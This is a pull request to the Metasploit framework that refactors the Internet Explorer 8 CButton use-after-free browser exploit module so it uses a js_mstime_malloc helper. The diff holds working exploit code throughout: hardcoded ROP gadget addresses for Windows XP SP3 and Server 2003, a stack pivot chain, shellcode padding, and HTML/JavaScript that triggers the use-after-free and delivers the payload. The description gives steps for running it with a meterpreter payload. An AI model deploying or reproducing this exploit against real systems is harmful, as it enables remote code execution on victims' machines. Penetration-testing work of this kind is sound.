### PR TITLE
Uses js_mstime_malloc to do the no-spray technique

### DIFF
--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -122,23 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def ie8_smil(my_target, p)
 
-		case my_target['Rop']
-		when :msvcrt
-			case my_target.name
-			when 'IE 8 on Windows XP SP3'
-				align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
-				xchg_esp  = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
-			when 'IE 8 on Windows Server 2003'
-				align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
-				xchg_esp  = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
-			end
-		else
-			align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
-			xchg_esp  = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
-		end
 
-		padding    = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
-		js_payload = Rex::Text.to_unescape(p)
 
 		js = %Q|
 		unicorn = unescape("#{padding}");
@@ -286,11 +270,25 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def load_exploit_html(my_target, cli)
 
-		p  = get_payload(my_target, cli)
-		js = ie8_smil(my_target, p)
+		case my_target['Rop']
+		when :msvcrt
+			case my_target.name
+			when 'IE 8 on Windows XP SP3'
+				align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
+				xchg_esp  = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
+			when 'IE 8 on Windows Server 2003'
+				align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
+				xchg_esp  = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
+			end
+		else
+			align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
+			xchg_esp  = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
+		end
 
-		html = %Q|
-		<!doctype html>
+		padding    = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
+		js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
+
+		html = %Q|<!doctype html>
 		<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
 		<head>
 		<meta>
@@ -298,33 +296,43 @@ class Metasploit3 < Msf::Exploit::Remote
 		</meta>
 
 		<script>
-		function helloWorld()
-		{
+		#{js_mstime_malloc}
+
+
+		function helloWorld() {
 			e_form = document.getElementById("formelm");
 			e_div = document.getElementById("divelm");
-
-			#{js}
 
 			for(i =0; i < 20; i++) {
 				document.createElement('button');
 			}
-			e_div.appendChild(document.createElement('button'))
+			e_div.appendChild(document.createElement('button'));
 			e_div.firstChild.applyElement(e_form);
 
-			e_div.innerHTML = ""
+			e_div.innerHTML = "";
 			e_div.appendChild(document.createElement('body'));
 
-			CollectGarbage();
+			CollectGarbage(); 
 
-			try {
-				a = document.getElementById('myanim');
-				a.values = animvalues;
+			p = unescape("#{padding}");
+			for (i=0; i < 3; i++) {
+				p += unescape("#{padding}");
 			}
-			catch(e) {}
-		}
+			p += unescape("#{js_payload}");
 
+			fo = unescape("#{align_esp}");
+			for (i=0; i < 55; i++) {
+				if (i == 54) { fo += unescape("#{xchg_esp}"); }
+				else         { fo += unescape("#{align_esp}"); }
+			}
+
+			fo += p;
+
+			mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:"myanim"});
+		}
 		</script>
 		</head>
+
 		<body onload="eval(helloWorld())">
 		<t:ANIMATECOLOR id="myanim"/>
 		<div id="divelm"></div>

--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -120,44 +120,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		return nil
 	end
 
-	def ie8_smil(my_target, p)
-
-
-
-		js = %Q|
-		unicorn = unescape("#{padding}");
-		for (i=0; i < 3; i++) {
-			unicorn += unescape("#{padding}");
-		}
-
-		unicorn += unescape("#{js_payload}");
-
-		animvalues = unescape("#{align_esp}");
-
-		for (i=0; i < 0xDC/4; i++) {
-			if (i == 0xDC/4-1) {
-				animvalues += unescape("#{xchg_esp}");
-			}
-			else {
-				animvalues += unescape("#{align_esp}");
-			}
-		}
-
-		animvalues += unicorn;
-
-		for(i = 0; i < 21; i++) {
-			animvalues += ";cyan";
-		}
-		|
-
-		if datastore['OBFUSCATE']
-			js = ::Rex::Exploitation::JSObfu.new(js)
-			js.obfuscate
-		end
-
-		return js
-	end
-
 	def junk(n=4)
 		return rand_text_alpha(n).unpack("V")[0].to_i
 	end


### PR DESCRIPTION
Now that we have a js_mstime_malloc, we should use that (see #1785).  This module serves as our first example.

To test this:  Fire up msfconsole, use exploit/windows/browser/ie_cbutton_uaf, set meterpreter as payload, run it against a Windows XP SP3 box with IE 8 on it.
